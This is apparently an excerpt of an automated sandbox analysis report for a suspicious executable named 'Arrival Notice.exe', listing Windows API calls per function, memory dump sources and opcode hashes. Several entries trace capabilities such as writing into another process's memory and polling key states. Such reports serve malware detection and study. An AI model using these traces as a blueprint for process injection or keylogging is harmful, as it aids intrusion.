                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                  • String ID:
                  • API String ID: 826366716-0
                  • Opcode ID: a0e2bf8bc11ef3783dd9b4ae79c50cb4c6b601a77f94a0ae2125c80eeac50f0a
                  • Instruction ID: 243c79ec798a91f86557cfd8893d3b123fa532623b2ea37a9cbe7ddf16bd4627
                  • Opcode Fuzzy Hash: a0e2bf8bc11ef3783dd9b4ae79c50cb4c6b601a77f94a0ae2125c80eeac50f0a
                  • Instruction Fuzzy Hash: 6661B131208201AFD714DF14C490F6ABBE5FF88308F14959EF6998B6A2CB35ED45CB92
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00418BCD
                  • VariantClear.OLEAUT32 ref: 00418C3E
                  • VariantClear.OLEAUT32 ref: 00418C9D
                  • VariantClear.OLEAUT32(?), ref: 00418D10
                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00418D3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$Clear$ChangeInitType
                  • String ID:
                  • API String ID: 4136290138-0
                  • Opcode ID: 1f84451c20de4339c6cac630abc431307a7f9df9da1fbfc7c96ae00f798611a3
                  • Instruction ID: c1a7e41a76a2ec74a55a01121bbbbcd5500832375956b6cf16ede138fdb481b3
                  • Opcode Fuzzy Hash: 1f84451c20de4339c6cac630abc431307a7f9df9da1fbfc7c96ae00f798611a3
                  • Instruction Fuzzy Hash: CC5169B5A00219EFCB14CF68D884AAAB7F8FF89314B15856AF905DB350E734E911CF94
                  APIs
                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00428BAE
                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00428BDA
                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00428C32
                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00428C57
                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00428C5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: PrivateProfile$SectionWrite$String
                  • String ID:
                  • API String ID: 2832842796-0
                  • Opcode ID: 9cb2cdf6ae1b9420e0f5b192006747da84909b37208d5fdf35102221b801b0c7
                  • Instruction ID: 4f5ccb7ae35ccd59be72c0da3447c2e9484eb5699cc79e5533e4f8dde2e319dd
                  • Opcode Fuzzy Hash: 9cb2cdf6ae1b9420e0f5b192006747da84909b37208d5fdf35102221b801b0c7
                  • Instruction Fuzzy Hash: 60515B35A002149FCB11DF65C881EAEBBF5FF49314F088099E949AB362CB35ED41CBA0
                  APIs
                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00438F40
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00438FD0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00438FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00439032
                  • FreeLibrary.KERNEL32(00000000), ref: 00439052
                    • Part of subcall function 003CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00421043,?,753CE610), ref: 003CF6E6
                    • Part of subcall function 003CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0040FA64,00000000,00000000,?,?,00421043,?,753CE610,?,0040FA64), ref: 003CF70D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                  • String ID:
                  • API String ID: 666041331-0
                  • Opcode ID: 04c532f46edabdf48f46a098288ad06e0f7c894c071caa9d51db33e7d02a88f4
                  • Instruction ID: 62808feb1f71e3321d8d744645850f31e40fb8d0f90c83b6dcc4b9fc9ba1438e
                  • Opcode Fuzzy Hash: 04c532f46edabdf48f46a098288ad06e0f7c894c071caa9d51db33e7d02a88f4
                  • Instruction Fuzzy Hash: 0E514934604205DFC715DF54C4848AABBB1FF49314F0880AAE90A9B762DB75ED86CF95
                  APIs
                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00446C33
                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00446C4A
                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00446C73
                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0042AB79,00000000,00000000), ref: 00446C98
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00446CC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Long$MessageSendShow
                  • String ID:
                  • API String ID: 3688381893-0
                  • Opcode ID: e1024ea53d0c958d9220f0fe8594b53e420d24e553cf38e8b220c9cc04058555
                  • Instruction ID: 2db7309644ad26d06ca3e9d5d4782f681e0d5b057c1b83941c965191c113d940
                  • Opcode Fuzzy Hash: e1024ea53d0c958d9220f0fe8594b53e420d24e553cf38e8b220c9cc04058555
                  • Instruction Fuzzy Hash: 2C41F735A00114AFE724CF68CCD4FAA7BA5EB0B350F16022AF895A73E0C375ED41CA49
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 9b8469b75fb527ae136614404d66eab1fc55a23d21a676ad589a5b91e99c3085
                  • Instruction ID: 3f99874bd38d3e47b9b1ab1d8a82c2b1eeca995085a8a6339c74ecc3ec857b32
                  • Opcode Fuzzy Hash: 9b8469b75fb527ae136614404d66eab1fc55a23d21a676ad589a5b91e99c3085
                  • Instruction Fuzzy Hash: 2241E232A002549FCB26DF79C881A5EB3A9EF89314F164669E515EB3D2D731AE01CB80
                  APIs
                  • GetCursorPos.USER32(?), ref: 003C9141
                  • ScreenToClient.USER32(00000000,?), ref: 003C915E
                  • GetAsyncKeyState.USER32(00000001), ref: 003C9183
                  • GetAsyncKeyState.USER32(00000002), ref: 003C919D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AsyncState$ClientCursorScreen
                  • String ID:
                  • API String ID: 4210589936-0
                  • Opcode ID: 66ba218f86a41b78ff8853fd676a5696fa3493b88a84c3a546da6e56554d9770
                  • Instruction ID: 1ec8eba47bbd1bc3f919f03ffe77eb94b554099006132d7781a0321482f90c08
                  • Opcode Fuzzy Hash: 66ba218f86a41b78ff8853fd676a5696fa3493b88a84c3a546da6e56554d9770
                  • Instruction Fuzzy Hash: 2F418231A0851AFBDF069F64C889BEEB774FF05324F25822AE425A72D0C7746D50CB96
                  APIs
                  • GetInputState.USER32 ref: 004238CB
                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00423922
                  • TranslateMessage.USER32(?), ref: 0042394B
                  • DispatchMessageW.USER32(?), ref: 00423955
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00423966
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                  • String ID:
                  • API String ID: 2256411358-0
                  • Opcode ID: 1aef0dd9dcb62633d05b3ee9714e0f598f81d74d7877ef87d03045bb99b18334
                  • Instruction ID: f441bb0457df672a12810421fc009921008162e2cf5c46513f74fdecb6b45ecc
                  • Opcode Fuzzy Hash: 1aef0dd9dcb62633d05b3ee9714e0f598f81d74d7877ef87d03045bb99b18334
                  • Instruction Fuzzy Hash: C53199F06042619EEB25DF34A849B6B37F89B06305F44096FD452C62A0D7BC95C5CB19
                  APIs
                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0042CF38
                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0042CF6F
                  • GetLastError.KERNEL32(?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFB4
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFC8
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFF2
                  Similarity
                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                  APIs
                  • GetWindowRect.USER32(?,?), ref: 00411915
                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 004119C1
                  • Sleep.KERNEL32(00000000,?,?,?), ref: 004119C9
                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 004119DA
                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004119E2
                  Similarity
                  • API ID: MessagePostSleep$RectWindow
                  APIs
                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00445745
                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0044579D
                  • _wcslen.LIBCMT ref: 004457AF
                  • _wcslen.LIBCMT ref: 004457BA
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00445816
                  Similarity
                  • API ID: MessageSend$_wcslen
                  APIs
                  • IsWindow.USER32(00000000), ref: 00430951
                  • GetForegroundWindow.USER32 ref: 00430968
                  • GetDC.USER32(00000000), ref: 004309A4
                  • GetPixel.GDI32(00000000,?,00000003), ref: 004309B0
                  • ReleaseDC.USER32(00000000,00000003), ref: 004309E8
                  Similarity
                  • API ID: Window$ForegroundPixelRelease
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 003ECDC6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003ECDE9
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003ECE0F
                  • _free.LIBCMT ref: 003ECE22
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003ECE31
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  APIs
                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                  • SelectObject.GDI32(?,00000000), ref: 003C96A2
                  • BeginPath.GDI32(?), ref: 003C96B9
                  • SelectObject.GDI32(?,00000000), ref: 003C96E2
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  APIs
                  Similarity
                  • API ID: _memcmp
                  APIs
                  • GetLastError.KERNEL32(?,?,?,003DF2DE,003E3863,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6), ref: 003E2DFD
                  • _free.LIBCMT ref: 003E2E32
                  • _free.LIBCMT ref: 003E2E59
                  • SetLastError.KERNEL32(00000000,003B1129), ref: 003E2E66
                  • SetLastError.KERNEL32(00000000,003B1129), ref: 003E2E6F
                  Similarity
                  • API ID: ErrorLast$_free
                  APIs
                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?,?,0041035E), ref: 0041002B
                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410046
                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410054
                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?), ref: 00410064
                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410070
                  Similarity
                  • API ID: From$Prog$FreeStringTasklstrcmpi
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?), ref: 0041E997
                  • QueryPerformanceFrequency.KERNEL32(?), ref: 0041E9A5
                  • Sleep.KERNEL32(00000000), ref: 0041E9AD
                  • QueryPerformanceCounter.KERNEL32(?), ref: 0041E9B7
                  • Sleep.KERNEL32 ref: 0041E9F3
                  Similarity
                  • API ID: PerformanceQuery$CounterSleep$Frequency
                  APIs
                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  Similarity
                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00410FCA
                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00410FD6
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00410FE5
                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00410FEC
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00411002
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0041102A
                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00411036
                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411045
                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0041104C
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411062
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420324
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420331
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 0042033E
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 0042034B
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420358
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420365
                  Similarity
                  • API ID: CloseHandle
                  APIs
                  • _free.LIBCMT ref: 003ED752
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003ED764
                  • _free.LIBCMT ref: 003ED776
                  • _free.LIBCMT ref: 003ED788
                  • _free.LIBCMT ref: 003ED79A
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00415C58
                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00415C6F
                  • MessageBeep.USER32(00000000), ref: 00415C87
                  • KillTimer.USER32(?,0000040A), ref: 00415CA3
                  • EndDialog.USER32(?,00000001), ref: 00415CBD
                  Similarity
                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                  APIs
                  • _free.LIBCMT ref: 003E22BE
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003E22D0
                  • _free.LIBCMT ref: 003E22E3
                  • _free.LIBCMT ref: 003E22F4
                  • _free.LIBCMT ref: 003E2305
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 4e545e1385c031b16d6f4e733092daf4947b4d26a4e491869107203e33453393
                  • Instruction ID: d3bc90bad5736fa80d0ce0f8d08ac4018d015edcf5fcc961fbd0b052a742ea69
                  • Opcode Fuzzy Hash: 4e545e1385c031b16d6f4e733092daf4947b4d26a4e491869107203e33453393
                  • Instruction Fuzzy Hash: 4FF030718101748B8663BF65BC4284E3B6CB7197617025A6FF514DA2F2C73504629BAD
                  APIs
                  • EndPath.GDI32(?), ref: 003C95D4
                  • StrokeAndFillPath.GDI32(?,?,004071F7,00000000,?,?,?), ref: 003C95F0
                  • SelectObject.GDI32(?,00000000), ref: 003C9603
                  • DeleteObject.GDI32 ref: 003C9616
                  • StrokePath.GDI32(?), ref: 003C9631
                  Similarity
                  • API ID: Path$ObjectStroke$DeleteFillSelect
                  • String ID:
                  • API String ID: 2625713937-0
                  • Opcode ID: cace0b6024d00fef95c9ec752c5fe9ff624e4d70875e7d4c35776e4c628ca600
                  • Instruction ID: 7977576d02372222bad48979c4a960df4e50ddbecebf4d638243d8709a8a3c57
                  • Opcode Fuzzy Hash: cace0b6024d00fef95c9ec752c5fe9ff624e4d70875e7d4c35776e4c628ca600
                  • Instruction Fuzzy Hash: 10F03C74006604EBDB265F65ED5CB683B69AB02332F09863EF425990F0C73489A2DF28
                  APIs
                  Strings
                  Similarity
                  • API ID: __freea$_free
                  • String ID: a/p$am/pm
                  • API String ID: 3432400110-3206640213
                  • Opcode ID: 3a4e92ae1d25d360358f1745c56333c17df01c79f1fde8c93d66a4f182bf3857
                  • Instruction ID: 98da8e62733333979c1fefc6bee7e4f53d987c9975e107195a5fb7126805962d
                  • Opcode Fuzzy Hash: 3a4e92ae1d25d360358f1745c56333c17df01c79f1fde8c93d66a4f182bf3857
                  • Instruction Fuzzy Hash: DBD117759002A6CACB2B9F6AC845BFEB7B4FF05300F250359E601ABAD5D3759D80CB91
                  APIs
                    • Part of subcall function 003D0242: EnterCriticalSection.KERNEL32(0048070C,00481884,?,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D024D
                    • Part of subcall function 003D0242: LeaveCriticalSection.KERNEL32(0048070C,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D028A
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  • __Init_thread_footer.LIBCMT ref: 00436238
                    • Part of subcall function 003D01F8: EnterCriticalSection.KERNEL32(0048070C,?,?,003C8747,00482514), ref: 003D0202
                    • Part of subcall function 003D01F8: LeaveCriticalSection.KERNEL32(0048070C,?,003C8747,00482514), ref: 003D0235
                    • Part of subcall function 0042359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004235E4
                    • Part of subcall function 0042359C: LoadStringW.USER32(00482390,?,00000FFF,?), ref: 0042360A
                  Strings
                  Similarity
                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                  • String ID: x#H$x#H$x#H
                  • API String ID: 1072379062-375009828
                  • Opcode ID: eb6d41e2c1166dd08c64ac024e2a4525085994e7856e0e759800c0a9445efc18
                  • Instruction ID: 045c7df757f5fabf8a05aead193ae9ed560000395ccd0828aa668e96950e8a4c
                  • Opcode Fuzzy Hash: eb6d41e2c1166dd08c64ac024e2a4525085994e7856e0e759800c0a9445efc18
                  • Instruction Fuzzy Hash: F6C19E71A0010AAFCB15EF58D890EBEB7B9EF48304F11806AFA059B291DB74ED45CB94
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 003E8B6E
                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 003E8B7A
                  • __dosmaperr.LIBCMT ref: 003E8B81
                  Strings
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide__dosmaperr
                  • String ID: .=
                  • API String ID: 2434981716-4056814303
                  • Opcode ID: b5044acd4f07b42fd4b4f1f8f9dea9930a291e049bfbb392bd6da1e51f60640d
                  • Instruction ID: e31c710e1f71d22358cc15dea5cf6f4013c04c17b4e8ca17fa4620acd23ab0f3
                  • Opcode Fuzzy Hash: b5044acd4f07b42fd4b4f1f8f9dea9930a291e049bfbb392bd6da1e51f60640d
                  • Instruction Fuzzy Hash: CA417E70D040E6AFDB269F16C880A7D7F96DF45304B1987A9F48D8B6C2DE318C028794
                  APIs
                    • Part of subcall function 0041B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004121D0,?,?,00000034,00000800,?,00000034), ref: 0041B42D
                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00412760
                    • Part of subcall function 0041B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0041B3F8
                    • Part of subcall function 0041B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0041B355
                    • Part of subcall function 0041B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00412194,00000034,?,?,00001004,00000000,00000000), ref: 0041B365
                    • Part of subcall function 0041B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00412194,00000034,?,?,00001004,00000000,00000000), ref: 0041B37B
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004127CD
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041281A
                  Strings
                  Similarity
                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                  • String ID: @
                  • API String ID: 4150878124-2766056989
                  • Opcode ID: 5083d959ddba812b02ad5b16752e28367e7f15f22e8a8b4041f3b9b3725448b1
                  • Instruction ID: 9017d4f027ab0df49a891cdebb4932b2b0db607aa98ea734cc2ad6e4e57621ea
                  • Opcode Fuzzy Hash: 5083d959ddba812b02ad5b16752e28367e7f15f22e8a8b4041f3b9b3725448b1
                  • Instruction Fuzzy Hash: C6414F76900218BFDB11DFA4CD81ADEBBB8EF05304F00809AFA55B7181DB746E95CBA4
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Arrival Notice.exe,00000104), ref: 003E1769
                  • _free.LIBCMT ref: 003E1834
                  • _free.LIBCMT ref: 003E183E
                  Strings
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\Arrival Notice.exe
                  • API String ID: 2506810119-2828020761
                  • Opcode ID: b0639971a0e40a68aad22475cb0228ef8c5acb4c299f07f5421d81e5e97c8908
                  • Instruction ID: 3f7f0334f1af920a7a01c1af18c095143c35dae6ef8d99878712d887fc6e0286
                  • Opcode Fuzzy Hash: b0639971a0e40a68aad22475cb0228ef8c5acb4c299f07f5421d81e5e97c8908
                  • Instruction Fuzzy Hash: 72318475A002A8EFDB22DB9ADC81D9EBBFCEB85710B1542AAF80497251D7705E41CB90
                  APIs
                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0041C306
                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0041C34C
                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00481990,010E64B8), ref: 0041C395
                  Strings
                  Similarity
                  • API ID: Menu$Delete$InfoItem
                  • String ID: 0
                  • API String ID: 135850232-4108050209
                  • Opcode ID: 9f09d2916cc6d868b97206d66011aace8969535b3dc69afee5d0365198357237
                  • Instruction ID: 0d0e244f926e5e9f935b16b04d77d4a554f1e3108e5a830e583991cd344009b5
                  • Opcode Fuzzy Hash: 9f09d2916cc6d868b97206d66011aace8969535b3dc69afee5d0365198357237
                  • Instruction Fuzzy Hash: D541BF312843019FD720DF25DC84B9BBBE4AB85314F04861FF9A597391C734A945CB5A
                  APIs
